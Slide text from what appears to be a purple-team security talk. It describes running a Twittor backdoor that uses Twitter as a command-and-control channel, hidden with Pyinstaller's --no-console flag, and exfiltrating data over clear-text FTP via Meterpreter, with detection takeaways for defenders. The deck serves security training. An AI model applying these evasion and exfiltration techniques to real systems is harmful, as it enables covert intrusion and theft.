  • 68. Purple Team - Benefits ● Blue team observes vulnerabilities/threats which may not have been considered ○ Learns how attacker could escalate privileges from local admin to domain admin ● Red team observes the footprint left behind from this attack and possibly how to minimize it ○ Can identify potential weaknesses in blue team monitoring/response processes ○ Provide more thorough recommendations @raffertylaura | @haydnjohnson
  • 70. A: Twittor ● Easy to install ● Easy to Use ● Easy to add Shellcode https://github.com/PaulSec/twittor @raffertylaura | @haydnjohnson
  • 71. A: Twittor - insides Simple Subprocess execution Stored as base64 encoded message
  • 72. A: Pyinstaller On Github Turn Python file into EXE @raffertylaura | @haydnjohnsonhttps://github.com/pyinstaller/pyinstaller
  • 73. A: Pyinstaller Python File becomes Executable @raffertylaura | @haydnjohnson
  • 74. @raffertylaura | @haydnjohnson Twittor: Backdoor Using Twitter
  • 75. A: Twittor Python file used as C2 Server Python file used as backdoor EXE - Pyinstaller @raffertylaura | @haydnjohnson
  • 76. A: Twittor - Retrieving command Send Command to execute Retrieve command @raffertylaura | @haydnjohnson
  • 77. B: Twittor - Network Traffic Reaching out to API Normal User Traffic?? @raffertylaura | @haydnjohnson
  • 78. B: Twittor - Client system Backdoor as Python Executable compiled with --no-console flag to hide output @raffertylaura | @haydnjohnson
  • 79. B: Traffic from Client Reaches out to twitter Src and Destination are internal IPs, sends to API @raffertylaura | @haydnjohnson
  • 80. B: What can you take away Check if there are any remote connections after hours, is it against policy? Again, Correlate logs with known C2 addresses See if AV picks it up @raffertylaura | @haydnjohnson
  • 81. Purple Team - Benefits Test if a C2 can reach out to twitter. Social Media may be blocked via the browser, but some sites can still be accessed via API etc. If it is not blocked, why not, can your blue team help to stop this and others. @raffertylaura | @haydnjohnson
  • 82. Data Exfiltration Clear Text FTP @raffertylaura | @haydnjohnson
  • 83. @raffertylaura | @haydnjohnson A: Data Exfiltration Through Clear Text FTP
  • 84. A: FTP Extraction Finding Data to extract @raffertylaura | @haydnjohnson
  • 85. A: Finding data Important data identified @raffertylaura | @haydnjohnson
  • 88. B: Meterpreter connection DLL injection Lots of chatter @raffertylaura | @haydnjohnson
  • 89. B: FTP connection Clear Text @raffertylaura | @haydnjohnson
  • 91. B: What can you take away? @raffertylaura | @haydnjohnson Disable FTP - should not have a business need for it really If there is a business need whitelist those IP addresses | Create a group of users specifically for FTP
  • 92. Purple Team - Exercise Clear Text Will any alarms trigger? Understand potential holes in alerting Measure time to detect and respond @raffertylaura | @haydnjohnson
  • 93. Conclusion Purple Teaming is Good @raffertylaura | @haydnjohnson
  • 94. Purple Team - Reiteration Provides more value than a Penetration Test Should be implemented into a regular schedule Helps train security personnel Helps make sure your boxes are tuned @raffertylaura | @haydnjohnson
  • 95. Limitations and Future Work ● So far we have limited detection tools to Windows Server event logs and Wireshark, (and a bit of Snort) ● Could be extended for enterprise security tools such as SIEM/IDS ● Powershell/WMI for blue team ● More advanced attacks, persistence using Powershell Empire @raffertylaura | @haydnjohnson
  • 97. References are in following slides @raffertylaura | @haydnjohnson
  • 98. Microsoft - 8 minute Video https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/ @raffertylaura | @haydnjohnson
  • 99. Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013 http://www.slideshare.net/beltface/hybrid-talk @raffertylaura | @haydnjohnson
  • 100. A: Downloads PowerShell file Client2 reaches out to Kali machine @raffertylaura | @haydnjohnson